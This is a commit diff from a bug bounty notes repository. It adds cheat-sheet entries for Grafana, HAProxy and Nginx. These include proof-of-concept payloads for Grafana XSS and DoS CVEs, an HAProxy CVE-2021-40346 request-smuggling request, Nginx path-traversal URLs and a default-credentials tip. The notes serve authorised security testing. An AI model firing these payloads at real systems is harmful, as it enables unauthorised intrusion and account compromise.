mirror of
https://github.com/daffainfo/AllAboutBugBounty.git
synced 2024-12-18 18:36:12 +00:00
Add nginx & haproxy
This commit is contained in:
parent
2e29583535
commit
f9466632b0
@ -1,4 +1,4 @@
|
|||||||
# Bypass Rate Limit
|
# 429 Rate limit Bypass
|
||||||
1. Try add some custom header
|
1. Try add some custom header
|
||||||
```
|
```
|
||||||
X-Forwarded-For : 127.0.0.1
|
X-Forwarded-For : 127.0.0.1
|
@ -25,8 +25,8 @@ These are my bug bounty notes that I have gathered from various sources, you can
|
|||||||
- [Bypass 2FA](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Bypass/Bypass%202FA.md)
|
- [Bypass 2FA](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Bypass/Bypass%202FA.md)
|
||||||
- [Bypass 403](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Bypass/Bypass%20403.md)
|
- [Bypass 403](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Bypass/Bypass%20403.md)
|
||||||
- [Bypass 304](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Bypass/Bypass%20304.md)
|
- [Bypass 304](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Bypass/Bypass%20304.md)
|
||||||
|
- [Bypass 429](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Bypass/Bypass%20429.md)
|
||||||
- [Bypass Captcha](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Bypass/Bypass%20Captcha.md)
|
- [Bypass Captcha](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Bypass/Bypass%20Captcha.md)
|
||||||
- [Bypass File Upload](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Bypass/Bypass%20File%20Upload.md)
|
|
||||||
- [Bypass Rate Limit](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Bypass/Bypass%20Rate%20Limit.md)
|
- [Bypass Rate Limit](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Bypass/Bypass%20Rate%20Limit.md)
|
||||||
|
|
||||||
## List CMS
|
## List CMS
|
||||||
@ -47,9 +47,12 @@ These are my bug bounty notes that I have gathered from various sources, you can
|
|||||||
- [Tabnabbing](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Misc/Tabnabbing.md)
|
- [Tabnabbing](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Misc/Tabnabbing.md)
|
||||||
|
|
||||||
## Technologies
|
## Technologies
|
||||||
|
- [Grafana](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Technologies/Grafana.md)
|
||||||
|
- [HAProxy](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Technologies/HAProxy.md)
|
||||||
- [Jira](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Technologies/Jira.md)
|
- [Jira](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Technologies/Jira.md)
|
||||||
- [Jenkins](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Technologies/Jenkins.md)
|
- [Jenkins](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Technologies/Jenkins.md)
|
||||||
- [Moodle](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Technologies/Moodle.md)
|
- [Moodle](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Technologies/Moodle.md)
|
||||||
|
- [Moodle](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Technologies/Nginx.md)
|
||||||
|
|
||||||
## Reconnaissance
|
## Reconnaissance
|
||||||
- [Scope Based Recon](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Recon/Scope.md)
|
- [Scope Based Recon](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Recon/Scope.md)
|
||||||
|
@ -1,9 +1,13 @@
|
|||||||
# Grafana
|
# Grafana
|
||||||
1. CVE-2020-13379 (Denial of Service)
|
1. CVE-2021-41174 (Reflected XSS)
|
||||||
|
```
|
||||||
|
<GRAFANA URL>/dashboard/snapshot/%7B%7Bconstructor.constructor('alert(1)')()%7D%7D?orgId=1
|
||||||
|
```
|
||||||
|
2. CVE-2020-13379 (Denial of Service)
|
||||||
```
|
```
|
||||||
<GRAFANA URL>/avatar/%7B%7Bprintf%20%22%25s%22%20%22this.Url%22%7D%7D
|
<GRAFANA URL>/avatar/%7B%7Bprintf%20%22%25s%22%20%22this.Url%22%7D%7D
|
||||||
```
|
```
|
||||||
2. CVE-2020-11110 (Stored XSS)
|
3. CVE-2020-11110 (Stored XSS)
|
||||||
```
|
```
|
||||||
POST /api/snapshots HTTP/1.1
|
POST /api/snapshots HTTP/1.1
|
||||||
Host: <GRAFANA URL>
|
Host: <GRAFANA URL>
|
||||||
@ -15,7 +19,7 @@ Connection: close
|
|||||||
|
|
||||||
{"dashboard":{"annotations":{"list":[{"name":"Annotations & Alerts","enable":true,"iconColor":"rgba(0, 211, 255, 1)","type":"dashboard","builtIn":1,"hide":true}]},"editable":true,"gnetId":null,"graphTooltip":0,"id":null,"links":[],"panels":[],"schemaVersion":18,"snapshot":{"originalUrl":"javascript:alert('Revers3c')","timestamp":"2020-03-30T01:24:44.529Z"},"style":"dark","tags":[],"templating":{"list":[]},"time":{"from":null,"to":"2020-03-30T01:24:53.549Z","raw":{"from":"6h","to":"now"}},"timepicker":{"refresh_intervals":["5s","10s","30s","1m","5m","15m","30m","1h","2h","1d"],"time_options":["5m","15m","1h","6h","12h","24h","2d","7d","30d"]},"timezone":"","title":"Dashboard","uid":null,"version":0},"name":"Dashboard","expires":0}
|
{"dashboard":{"annotations":{"list":[{"name":"Annotations & Alerts","enable":true,"iconColor":"rgba(0, 211, 255, 1)","type":"dashboard","builtIn":1,"hide":true}]},"editable":true,"gnetId":null,"graphTooltip":0,"id":null,"links":[],"panels":[],"schemaVersion":18,"snapshot":{"originalUrl":"javascript:alert('Revers3c')","timestamp":"2020-03-30T01:24:44.529Z"},"style":"dark","tags":[],"templating":{"list":[]},"time":{"from":null,"to":"2020-03-30T01:24:53.549Z","raw":{"from":"6h","to":"now"}},"timepicker":{"refresh_intervals":["5s","10s","30s","1m","5m","15m","30m","1h","2h","1d"],"time_options":["5m","15m","1h","6h","12h","24h","2d","7d","30d"]},"timezone":"","title":"Dashboard","uid":null,"version":0},"name":"Dashboard","expires":0}
|
||||||
```
|
```
|
||||||
3. CVE-2019-15043 (Grafana Unauthenticated API)
|
4. CVE-2019-15043 (Grafana Unauthenticated API)
|
||||||
```
|
```
|
||||||
POST /api/snapshots HTTP/1.1
|
POST /api/snapshots HTTP/1.1
|
||||||
Host: <GRAFANA URL>
|
Host: <GRAFANA URL>
|
||||||
@ -27,11 +31,11 @@ Content-Type: application/json
|
|||||||
|
|
||||||
{"dashboard":{"editable":false,"hideControls":true,"nav":[{"enable":false,"type":"timepicker"}],"rows": [{}],"style":"dark","tags":[],"templating":{"list":[]},"time":{},"timezone":"browser","title":"Home","version":5},"expires": 3600}
|
{"dashboard":{"editable":false,"hideControls":true,"nav":[{"enable":false,"type":"timepicker"}],"rows": [{}],"style":"dark","tags":[],"templating":{"list":[]},"time":{},"timezone":"browser","title":"Home","version":5},"expires": 3600}
|
||||||
```
|
```
|
||||||
4. Default Credentials
|
5. Default Credentials
|
||||||
```
|
```
|
||||||
Try to login using admin as username and password
|
Try to login using admin as username and password
|
||||||
```
|
```
|
||||||
5. Signup Enabled
|
6. Signup Enabled
|
||||||
```
|
```
|
||||||
<GRAFANA URL>/signup
|
<GRAFANA URL>/signup
|
||||||
```
|
```
|
15
Technologies/HAProxy.md
Normal file
15
Technologies/HAProxy.md
Normal file
@ -0,0 +1,15 @@
|
|||||||
|
# HAProxy
|
||||||
|
1. CVE-2021-40346 (HTTP Request Smuggling)
|
||||||
|
```
|
||||||
|
POST /index.html HTTP/1.1
|
||||||
|
Host: abc.com
|
||||||
|
Content-Length0aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa:
|
||||||
|
Content-Length: 60
|
||||||
|
|
||||||
|
GET /admin/add_user.py HTTP/1.1
|
||||||
|
Host: abc.com
|
||||||
|
abc: xyz
|
||||||
|
```
|
||||||
|
|
||||||
|
Source:
|
||||||
|
- [JFrog](https://jfrog.com/blog/critical-vulnerability-in-haproxy-cve-2021-40346-integer-overflow-enables-http-smuggling/)
|
11
Technologies/Nginx.md
Normal file
11
Technologies/Nginx.md
Normal file
@ -0,0 +1,11 @@
|
|||||||
|
# Nginx
|
||||||
|
|
||||||
|
1. Directory traversal
|
||||||
|
```
|
||||||
|
https://example.com/folder1../folder1/folder2/static/main.css
|
||||||
|
https://example.com/folder1../%s/folder2/static/main.css
|
||||||
|
https://example.com/folder1/folder2../folder2/static/main.css
|
||||||
|
https://example.com/folder1/folder2../%s/static/main.css
|
||||||
|
https://example.com/folder1/folder2/static../static/main.css
|
||||||
|
https://example.com/folder1/folder2/static../%s/main.css
|
||||||
|
```
|
Loading…
Reference in New Issue
Block a user